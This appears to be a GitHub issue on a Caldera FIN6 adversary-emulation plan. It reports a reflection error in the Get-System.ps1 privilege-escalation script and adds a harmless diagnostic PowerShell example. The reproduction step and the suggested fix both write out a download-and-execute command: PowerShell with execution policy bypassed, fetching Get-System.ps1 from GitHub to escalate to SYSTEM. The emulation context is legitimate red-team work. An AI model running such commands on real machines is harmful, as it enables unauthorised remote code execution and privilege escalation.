
[FIN6 Plan] Get-ProcAddress : Exception calling "GetMethod" Ambiguous match found. #175

Description

@Mahshid-MSH

When executing the FIN6 emulation plan (or any plan that uses the Get-System.ps1 payload), the script fails with the following error:
Get-ProcAddress : Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."

This is a known issue in PowerSploit’s Get-System.ps1 because .NET reflection on GetProcAddress is ambiguous on recent Windows versions. The BC‑SECURITY/Empire fork already contains the fix.


To Reproduce

Run the following command on a modern Windows 10/11 system (fully updated) within the context of the FIN6 YAML plan:
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Get-System.ps1'); Get-System -ServiceName 'mstdc' -PipeName 'mstdc'"

Expected behavior

The Get-System script should execute successfully, escalate privileges to SYSTEM via named pipe impersonation, and continue the Caldera operation without errors.

Environment

Windows version: Windows Server 2019

Suggested fix

Update the FIN6 YAML ability that invokes Get-System.ps1 to use the fixed version from BC‑SECURITY/Empire:
https://raw.githubusercontent.com/BC-SECURITY/Empire/v3.4.0/data/module_source/privesc/Get-System.ps1

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/v3.4.0/data/module_source/privesc/Get-System.ps1'); Get-System -ServiceName 'mstdc' -PipeName 'mstdc'"

Here is the screenshot of the new PowerShell command:

Image
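The reflection failure named in the error above, reproduced on a harmless overloaded method as an added example (not code from the issue author, PowerSploit, Empire or Caldera). The helper name Get-MethodOverloads is hypothetical, and the internal type name Microsoft.Win32.UnsafeNativeMethods is an assumption taken from PowerSploit's Get-ProcAddress helper rather than from this page.

```powershell
# Added example: why a name-only GetMethod() call raises "Ambiguous match found."

function Get-MethodOverloads {
    # Hypothetical helper: list every overload of $Name on $Type as "Name(ParamTypes)".
    param([Type]$Type, [string]$Name)
    $flags = [Reflection.BindingFlags]'Public,NonPublic,Static,Instance'
    $Type.GetMethods($flags) |
        Where-Object { $_.Name -eq $Name } |
        ForEach-Object {
            $params = ($_.GetParameters() | ForEach-Object { $_.ParameterType.Name }) -join ', '
            '{0}({1})' -f $_.Name, $params
        }
}

# 1. [Math]::Abs has several overloads, so a lookup by name alone cannot pick one.
Get-MethodOverloads -Type ([Math]) -Name 'Abs'
try {
    [Math].GetMethod('Abs') | Out-Null
} catch {
    # PowerShell wraps the .NET exception; the inner one is the real cause.
    $_.Exception.Message                              # Exception calling "GetMethod" with "1" argument(s) ...
    $_.Exception.InnerException.GetType().FullName    # System.Reflection.AmbiguousMatchException
}

# 2. Passing the parameter types selects exactly one overload.
$abs = [Math].GetMethod('Abs', [Type[]]@([double]))
$abs.Invoke($null, @([double]-2.5))

# 3. Diagnostic for the host in this issue (Windows PowerShell / .NET Framework only):
#    count the GetProcAddress overloads on the internal type the script reflects on.
#    More than one line of output means a name-only lookup will be ambiguous there.
$native = [Uri].Assembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
if ($native) {
    Get-MethodOverloads -Type $native -Name 'GetProcAddress'
} else {
    'Microsoft.Win32.UnsafeNativeMethods is not present in this runtime.'
}
```

Step 3 only lists signatures, which is enough to confirm whether a given host is affected before changing the ability's payload URL.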
